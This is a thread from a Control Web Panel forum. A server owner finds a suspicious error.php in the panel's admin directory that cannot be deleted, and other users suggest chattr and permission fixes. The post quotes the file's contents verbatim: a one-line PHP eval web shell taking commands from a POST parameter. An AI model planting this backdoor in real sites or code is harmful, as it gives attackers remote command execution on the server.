Control Web Panel

WebPanel => CentOS-WebPanel Bugs => Topic started by: Bijan on July 17, 2025, 12:18:47 AM

Title: Cannot Delete File
Post by: Bijan on July 17, 2025, 12:18:47 AM

On my server running CWP, I recently found a file located in `/usr/local/cwpsrv/htdocs/admin/admin` called `error.php` that just has the contents `<?php @eval($_POST['shell']);?>` (very concerning).

Code: [Select]

whoami returns `root`.

Code: [Select]

rm -rf error.phpreturns “Permission denied.”

Code: [Select]

lsattr error.php returns `-------------e-- error.php`.

Code: [Select]

getfacl error.php returns:
```
# file: error.php
# owner: root
# group: root
user::rwx
group::r-x
other::r-x
```

Code: [Select]

mount | grep "$(df error.php | tail -1 | awk '{print $1}')" Returns:

`/dev/mapper/centos_centos7-root on / type ext4 (rw,relatime,data=ordered)`

This file was obviously not included with the standard cwpsrv files. What else can I do to delete this file?

Title: Re: Cannot Delete File
Post by: overseer on July 17, 2025, 12:44:52 AM

Not present on any servers I manage (one CentOS 7.9 holdout, a couple of AlmaLinux 8 servers, a couple of AL9 test beds).
Try to see if the immutable bit is set, then remove:

Code: [Select]

chattr -i error.php
rm -rf error.php

Title: Re: Cannot Delete File
Post by: Bijan on July 17, 2025, 01:07:43 AM

That did not work. I have remove the I(mmutable) and e(xtent) flags. lsattr returns --------------.

Title: Re: Cannot Delete File
Post by: Starburst on July 19, 2025, 04:18:03 AM

Ditto to what @overseer posted.

On our AL9 servers, there is no error.php in usr/local/cwpsrv/htdocs/admin/admin

1 other thing you can try is goto User Accounts -> Fix Permissions -> Select User (nobody), click on all 3 boxes, and then the blue bar 'Fix Selected Issues'

Title: Re: Cannot Delete File
Post by: rcschaff on July 20, 2025, 01:39:49 AM

You need to chattr -i ../admin

You then should be able to remove the error.php file.  Then chattr +i ../admin